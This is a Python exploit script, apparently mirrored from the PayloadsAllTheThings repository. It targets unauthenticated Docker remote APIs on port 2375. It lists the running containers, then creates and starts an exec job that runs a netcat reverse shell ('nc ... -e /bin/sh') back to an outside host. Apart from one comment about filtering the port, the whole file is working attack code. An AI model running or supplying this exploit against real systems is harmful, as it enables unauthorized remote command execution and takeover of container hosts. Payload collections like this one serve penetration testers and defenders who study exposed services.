mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
49 lines
No EOL
1.6 KiB
Python
49 lines
No EOL
1.6 KiB
Python
from __future__ import print_function
|
|
import requests
|
|
import logging
|
|
import json
|
|
import urllib.parse
|
|
|
|
# NOTE
|
|
# Enable Remote API with the following command
|
|
# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
|
|
# This is an intended feature, remember to filter the port 2375..
|
|
|
|
name = "docker"
|
|
description = "Docker RCE via Open Docker API on port 2375"
|
|
author = "Swissky"
|
|
|
|
# Step 1 - Extract id and name from each container
|
|
ip = "127.0.0.1"
|
|
port = "2375"
|
|
data = "containers/json"
|
|
url = "http://{}:{}/{}".format(ip, port, data)
|
|
r = requests.get(url)
|
|
|
|
if r.json:
|
|
for container in r.json():
|
|
container_id = container['Id']
|
|
container_name = container['Names'][0].replace('/','')
|
|
print((container_id, container_name))
|
|
|
|
# Step 2 - Prepare command
|
|
cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
|
|
data = "containers/{}/exec".format(container_name)
|
|
url = "http://{}:{}/{}".format(ip, port, data)
|
|
post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
|
|
post_header = {
|
|
"Content-Type": "application/json"
|
|
}
|
|
r = requests.post(url, json=json.loads(post_json))
|
|
|
|
|
|
# Step 3 - Execute command
|
|
id_cmd = r.json()['Id']
|
|
data = "exec/{}/start".format(id_cmd)
|
|
url = "http://{}:{}/{}".format(ip, port, data)
|
|
post_json = '{ "Detach":false,"Tty":false}'
|
|
post_header = {
|
|
"Content-Type": "application/json"
|
|
}
|
|
r = requests.post(url, json=json.loads(post_json))
|
|
print(r) |